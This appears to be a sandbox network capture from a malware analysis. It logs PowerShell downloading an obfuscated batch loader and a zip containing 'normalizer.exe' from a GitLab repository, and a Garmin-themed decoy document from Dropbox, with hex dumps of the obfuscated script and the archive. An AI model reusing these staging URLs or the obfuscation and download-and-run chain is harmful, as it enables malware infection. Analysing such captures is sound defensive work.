2024-12-12 12:05:03 UTC	196	OUT	GET /stare2/garmin/-/raw/main/garsukhjdf11.bat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gitlab.com Connection: Keep-Alive
2024-12-12 12:05:03 UTC	439	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 12:05:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 33719 Connection: close CF-Ray: 8f0d94989a608c4b-EWR CF-Cache-Status: HIT Accept-Ranges: bytes Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60 Content-Disposition: inline ETag: "09fc89c7b285fe0b3ddf38a151bcba0a" Strict-Transport-Security: max-age=31536000
2024-12-12 12:05:03 UTC	2131	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2024-12-12 12:05:03 UTC	504	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 37 36 43 44 6a 6b 25 32 46 56 41 72 6d 45 50 45 62 58 71 39 31 61 68 31 6c 49 7a 44 6e 75 4c 46 30 35 50 78 70 6d 25 32 46 25 32 46 52 51 4d 44 78 44 61 39 6c 5a 33 46 59 45 77 65 4c 67 77 31 42 4d 32 32 6e 54 51 34 59 6f 75 54 48 47 43 67 73 79 6b 33 71 62 54 73 46 32 72 25 32 46 6a 25 32 46 41 50 78 4d 71 63 77 4b 74 65 57 77 79 57 49 72 4a 69 75 54 7a 78 33 56 55 78 73 61 6b 67 4c 76 50 37 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=76CDjk%2FVArmEPEbXq91ah1lIzDnuLF05Pxpm%2F%2FRQMDxDa9lZ3FYEweLgw1BM22nTQ4YouTHGCgsyk3qbTsF2r%2Fj%2FAPxMqcwKteWwyWIrJiuTzx3VUxsakgLvP7E%3D"}],"group":"cf-nel","max_age":604800}N
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: ff fe ff fe 3e 6e 75 6c 20 32 3e 26 31 20 26 63 6c 73 0a 3b 40 40 65 25 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e e3 83 be 28 e2 8c 90 e2 96 a0 5f 5e e2 96 a0 29 e3 83 8e 28 e2 8a 99 cf 89 e2 8a 99 29 28 e2 97 95 e2 80 bf e2 97 95 29 25 25 28 e2 97 95 e2 80 bf e2 97 95 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 97 95 5e e2 80 bf e2 97 95 29 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 25 25 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 8a 99 cf 89 e2 8a 99 29 e2 94 8c 28 20 e0 b2 a0 Data Ascii: >nul 2>&1 &cls;@@e%()( _)(_)(_^)()()%%()(_)()(^)()( _)%%(_)( _)()()(
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 97 95 e2 80 bf e2 97 95 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 5e 29 e3 83 8e e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 8a 99 cf 89 e2 8a 99 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 25 6c 6c 5e 25 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 5e 29 e3 83 8e 28 e2 8a 99 cf 89 e2 8a 99 29 28 e2 8a 99 cf 89 e2 8a 99 29 25 6c 69 69 69 6c 25 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 97 95 e2 80 bf 5e e2 97 95 29 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 8a 99 cf 89 e2 8a 99 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e Data Ascii: )(_^)( _)()(_)()%ll^%()( _)( _)(_^)()()%liiil%()(^)()( _)()(_)
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 98 af 5e e5 b7 b2 e7 a5 9e e7 a5 9e e7 a5 9e 25 25 e8 a8 8a e8 a8 8a e8 ad b7 e9 ad 94 5e e5 ad 97 e8 a8 8a 25 5e 65 74 20 67 5e 6f 74 25 e7 84 a1 e4 b8 8a e6 b3 95 e8 ad b7 e8 a1 8c 5e e8 a8 8a 25 25 e6 b3 95 e7 9a 84 e8 b2 bc e5 b7 b2 e6 98 af e4 bf 9d 5e 25 25 e5 87 a1 e7 84 a1 5e e6 96 87 e8 a8 8a e6 ad a4 e5 87 a1 25 6f 20 65 25 28 e2 8a 99 cf 89 e2 8a 99 29 28 e2 8a 99 cf 89 e2 8a 99 29 28 e2 97 95 e2 80 bf e2 97 95 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 5e 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 8a 99 cf 89 e2 8a 99 29 25 63 25 28 e2 8a 99 cf 89 e2 8a 99 29 5e e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 8a 99 cf 89 e2 8a 99 29 e2 94 8c Data Ascii: ^%%^%^et g^ot%^%%^%%^%o e%()()()(_^)()()%c%()^(_)()( _)()
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 96 af e5 85 8b 3a 7e 32 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 35 31 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 35 37 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 35 39 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 33 33 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 33 36 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 34 36 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 35 38 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 32 31 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 31 31 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 32 35 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 31 38 2c 31 25 25 e8 80 bb e6 96 af e6 96 af e5 85 8b 3a 7e 36 33 2c 31 25 25 e8 80 bb Data Ascii: :~2,1%%:~51,1%%:~57,1%%:~59,1%%:~33,1%%:~36,1%%:~46,1%%:~58,1%%:~21,1%%:~11,1%%:~25,1%%:~18,1%%:~63,1%%
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e3 83 be 28 5e e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 8a 99 cf 89 e2 8a 99 29 25 68 6f 20 3d 44 26 40 70 61 25 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 8a 99 cf 89 e2 8a 99 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 97 95 5e e2 80 bf e2 97 95 29 28 e2 8a 99 cf 89 e2 8a 99 29 25 5e 25 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 5e 29 e3 83 8e e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 97 95 e2 80 bf e2 97 95 29 28 e2 8a 99 cf 89 e2 8a 99 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 Data Ascii: )()( _)( _)(^_)()%ho =D&@pa%( _)()()(_)(^)()%^%(_^)( _)()()(_)(_
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 31 31 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 33 35 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 32 32 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 33 32 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 35 38 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 36 33 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 34 36 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 35 31 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 36 32 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 33 34 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 31 30 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e 32 2c 31 25 25 e9 98 bf e5 be b7 e5 85 8b e8 89 b2 3a 7e Data Ascii: %%:~11,1%%:~35,1%%:~22,1%%:~32,1%%:~58,1%%:~63,1%%:~46,1%%:~51,1%%:~62,1%%:~34,1%%:~10,1%%:~2,1%%:~
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 36 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 31 30 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 35 36 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 35 30 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 33 35 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 31 37 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 32 34 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 34 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 36 31 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 34 39 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 33 30 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 35 37 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 3a 7e 33 2c 31 25 25 e8 80 bb e8 80 bb e8 b4 9d e7 88 b1 Data Ascii: 6,1%%:~10,1%%:~56,1%%:~50,1%%:~35,1%%:~17,1%%:~24,1%%:~4,1%%:~61,1%%:~49,1%%:~30,1%%:~57,1%%:~3,1%%
2024-12-12 12:05:03 UTC	1369	IN	Data Raw: 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 28 e2 97 95 e2 80 bf 5e e2 97 95 29 25 25 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 8a 99 cf 89 e2 8a 99 5e 29 e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e e3 83 be 28 e2 8c 90 e2 96 a0 5f e2 96 a0 29 e3 83 8e 28 e2 97 95 e2 80 bf e2 97 95 29 e2 94 8c 28 20 e0 b2 a0 5f e0 b2 a0 29 e2 94 98 25 69 6c 6c 69 5e 69 20 5f 5f 61 75 25 e7 a5 9e e7 9a 84 e8 a2 ab e6 ad a4 e6 98 af e6 ad a4 5e 25 74 68 6f 5e 72 5f 25 e6 81 af e8 ad b7 e5 ad 97 e7 84 a1 e7 a7 98 5e e8 ad b7 25 25 e6 98 af e4 ba ba e8 b2 bc e9 ad 94 5e e8 a1 8c e8 a2 ab 25 5f 20 5f 5f 5e 67 69 74 68 25 e4 bf 9d e9 80 99 5e e4 bf 9d e8 a8 Data Ascii: ( _)( _)( _)(^)%%(_)(^)(_)(_)()( _)%illi^i __au%^%tho^r_%^%%^%_ __^gith%^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49710	162.125.65.18	443	6456	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 12:05:09 UTC	191	OUT	GET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1 Host: www.dropbox.com Connection: Keep-Alive
2024-12-12 12:05:10 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; base-uri 'self' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; frame-ancestors 'self' https://.dropbox.com ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'un [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc17b8d8bd17bcf3ea55ad3892e7.dl.dropboxusercontent.com/cd/0/get/CgE6CtD6YCSomLayRqankLpMZ4hKatMiFqC_NNjly9mJ8jcuW7hpxcTmIEM3JSB3YE-qOTtr8pb6sqobnzP-yWfaApRrRhawEgsmB4TBQJVjFv91TPfdvLL3aS3ynmc8vJtIg6b2HCKeeESi5H0bIN25/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTgzMjc3MTQ3OTU3MzY0MTM0NzQ5NTcxNTU3ODk0MTE1MDcwNTE5; Path=/; Expires=Tue, 11 Dec 2029 12:05:09 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=h_nrCU_HPGI110BAOWy7F8-x; Path=/; Domain=dropbox.com; Expires=Fri, 12 Dec 2025 12:05:09 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=h_nrCU_HPGI110BAOWy7F8-x; Path=/; Expires=Fri, 12 Dec 2025 12:05:09 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=cIDNz5fKhE; Path=/; Expires=Fri, 12 Dec 2025 12:05:09 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 11 Dec 2029 12:05:09 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Thu, 12 Dec 2024 12:05:10 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: c618aa1f2a1b4481bf522d9e0d4780c5 Connection: close
2024-12-12 12:05:10 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49726	172.65.251.78	443	6520	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 12:05:16 UTC	99	OUT	GET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1 Host: gitlab.com Connection: Keep-Alive
2024-12-12 12:05:17 UTC	453	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 12:05:17 GMT Content-Type: application/octet-stream Content-Length: 68976560 Connection: close CF-Ray: 8f0d94ec8ebc0f5f-EWR CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60 Content-Disposition: attachment ETag: "f4f0362f6d170e29ad1750b133f00af7" Strict-Transport-Security: max-age=31536000
2024-12-12 12:05:17 UTC	2131	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
2024-12-12 12:05:17 UTC	502	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 76 75 6f 25 32 42 6a 71 61 37 67 57 58 79 53 46 51 48 6e 69 4f 76 39 4e 6c 35 59 4c 38 35 50 5a 4b 57 6e 31 55 72 4f 25 32 46 34 65 57 79 68 42 77 56 61 44 30 43 30 76 6d 6a 4b 6a 47 7a 69 73 25 32 42 4b 34 4c 5a 51 30 46 4b 39 6c 49 48 56 58 42 46 4f 31 65 7a 4f 4c 4a 55 79 75 73 52 49 41 43 55 47 6e 52 4f 63 37 50 45 61 6f 58 33 67 75 6f 39 74 6b 66 42 4c 25 32 46 4a 32 66 73 6b 58 54 45 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuo%2Bjqa7gWXySFQHniOv9Nl5YL85PZKWn1UrO%2F4eWyhBwVaD0C0vmjKjGzis%2BK4LZQ0FK9lIHVXBFO1ezOLJUyusRIACUGnROc7PEaoX3guo9tkfBL%2FJ2fskXTE%3D"}],"group":"cf-nel","max_age":604800}NEL
2024-12-12 12:05:17 UTC	1021	IN	Data Raw: 50 4b 03 04 0a 00 00 00 00 00 71 a8 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 53 63 72 69 70 74 73 2f 50 4b 03 04 14 00 00 00 08 00 c8 3d 56 58 30 70 28 4b 74 cd 00 00 9c a7 01 00 16 00 00 00 53 63 72 69 70 74 73 2f 6e 6f 72 6d 61 6c 69 7a 65 72 2e 65 78 65 ec bd 09 60 93 55 d6 30 fc 64 6b d3 8d 27 05 02 65 93 00 05 0a 05 2c 14 b5 35 a0 09 4d e4 09 a4 52 36 a9 0a da d2 05 d0 42 3b ed 13 16 05 6c 4d 3b d3 f0 18 45 47 1d 67 c6 51 c6 65 c4 d1 99 71 d4 61 53 b1 a5 d0 05 0a 14 54 2c e0 52 c5 e5 89 01 2c 2e 6d d9 fa fc e7 dc 7b 93 a6 a5 a8 ef bc df fb 7d ff f7 7e 6f da e4 dc 7d bf e7 9e 73 ef 3d e7 a6 df b1 99 d3 70 1c a7 85 af a2 70 dc 0e 8e 7e 2c dc cf 7f 3a e0 db 67 f8 ae 3e dc 9b 11 07 47 ec 50 39 0f 8e 58 b0 7c 45 89 a9 a8 b8 70 59 71 f6 4a 53 Data Ascii: PKqKYScripts/PK=VX0p(KtScripts/normalizer.exe`U0dk'e,5MR6B;lM;EGgQeqaST,R,.m{}~o}s=pp~,:g>GP9X\|EpYqJS
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 25 90 97 40 d3 90 6a 48 f6 56 d2 1c c9 55 1a fb 69 21 b1 03 f2 9c cc f2 74 4a b5 0e 52 49 39 79 30 c7 d1 8c 62 68 46 98 cb af 21 17 2b bf dd ce e5 9b 75 7d c1 d9 a5 4b 97 be f4 e7 63 6a de df 91 f6 3b 0a f5 78 1f 52 96 3f 4d e8 99 e2 67 83 02 29 be 15 19 5a f4 c9 90 e8 ad de c5 89 4a ba f9 e3 e2 c1 fc 76 dd 0e f0 ce b7 a6 6a c4 c8 f4 c4 4f c1 b1 e4 3b bf 26 5d 3a 45 ba ec d5 44 1c ab 8b e3 2d 0e 69 af 43 ba 33 c9 21 95 80 f1 7e c1 21 9d b2 de 6d bd cb ba c4 ba 78 09 0c 55 3a 86 16 de 86 03 35 29 19 1a e1 9c 77 d1 24 1c 4d 59 f2 73 31 d0 2e de 89 e1 f3 49 19 c4 89 d6 9d 38 37 a0 c8 82 74 2c b9 01 c3 24 08 9e 82 78 93 62 9c 7a 1a e6 76 15 5f 5e 0e cd f9 2e 4e 05 ff 06 18 78 d7 60 e1 bd 0b e2 97 e3 34 ca 94 af 1d 87 7d 83 56 09 ac 52 b3 7c 16 66 70 c5 49 d7 Data Ascii: %@jHVUi!tJRI9y0bhF!+u}Kcj;xR?Mg)ZJvjO;&]:ED-iC3!~!mxU:5)w$MYs1.I87t,$xbzv_^.Nx`4}VR\|fpI
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 8d 42 c5 49 31 ca a1 f9 44 90 da 7d 87 39 52 b2 06 08 68 dd 11 4d 12 3e 2c e7 44 04 56 ee 23 e0 5e 51 e5 94 ea 90 ae 5a 8b 13 d7 bb 26 8e df de 07 b3 8c c5 cc 9c fd 18 d9 08 09 6b 68 9c 2f 21 0e c4 90 1d 18 dc 5d ab 66 c1 a3 31 f8 30 5a 36 59 90 3e c9 b7 a5 8e 11 07 f1 db a3 d0 5d 47 dd 23 a1 cb d4 e0 31 ca f5 35 f3 38 dd 97 cc 5f 7d be cd 33 0a 3d 91 3c 32 74 04 68 a2 d7 b5 04 39 40 6e 30 c3 10 37 7c 00 f3 2b df 7d f3 48 d7 b8 7c b7 79 24 0d f4 8e 96 90 85 58 a4 6d e8 1d 48 c9 5d a7 c6 e2 41 88 53 a4 f6 3c ab 7d 9e 9e 64 69 ca 77 3f 70 cd 48 71 50 57 42 5f 68 09 02 c2 84 56 42 42 50 42 ac 17 69 73 3b 2d e6 20 4c dc cf 83 0b bf 1d fa 99 3a 46 63 6e fc 76 4d 3e 54 f0 4b 98 a0 dd d0 66 2d c5 9c 14 69 2e be bb 26 b8 ee 15 c1 60 58 1b d7 45 0b 7b b7 a6 9c 27 Data Ascii: BI1D}9RhM>,DV#^QZ&kh/!]f10Z6Y>]G#158_}3=<2th9@n07\|+}H\|y$XmH]AS<}diw?pHqPWB_hVBBPBis;- L:FcnvM>TKf-i.&`XE{'
2024-12-12 12:05:17 UTC	1369	IN	Data Raw: 54 a1 65 ec 95 97 c3 9d 1d 7b f2 17 0e 49 a6 73 c2 2a ed 4d 47 e6 7b 3f 16 14 46 d4 60 f9 dc 98 60 47 fe 35 06 78 4e a0 9c 1f f0 bd 42 bc 8f 8a 9f 21 d9 0d 63 f0 88 7c a1 13 31 21 10 fb f6 d4 9c fe ae 9b 85 c4 76 7e fb d0 9b f2 dd 17 ad c5 91 f0 7b c7 1a 6d be bb c6 84 c8 d5 dd 41 9c 3a 88 53 95 89 10 00 ca 41 d1 92 0f f4 90 39 df dc 2c d6 fa a7 02 b1 82 f8 d7 24 0f b1 71 1c ac 02 c4 c2 6f 6f 96 a3 6c 48 50 d6 aa 03 b1 22 31 96 0e 63 35 02 22 e7 b7 d7 24 56 db 52 72 e3 53 90 04 75 c6 27 b9 ff 8c 6d 72 99 b0 f0 b8 d4 b3 69 04 18 7b 39 b4 8b c5 ba b8 86 f2 f1 c9 30 89 8e 3a a5 e3 a9 ba 9b ae 83 16 5e 03 6d 20 de c7 ea 3f ba ab fe d1 ac fe 84 6d 27 f5 77 26 9e 48 e3 b7 47 f7 03 ba 8f d4 ea 3c a9 55 b5 09 56 ed be f9 ee 0b c4 ed 02 71 db 63 72 b8 f7 a8 1d 4a Data Ascii: Te{Is*MG{?F``G5xNB!c\|1!v~{mA:SA9,$qoolHP"1c5"$VRrSu'mri{90:^m ?m'w&HG<UVqcrJ
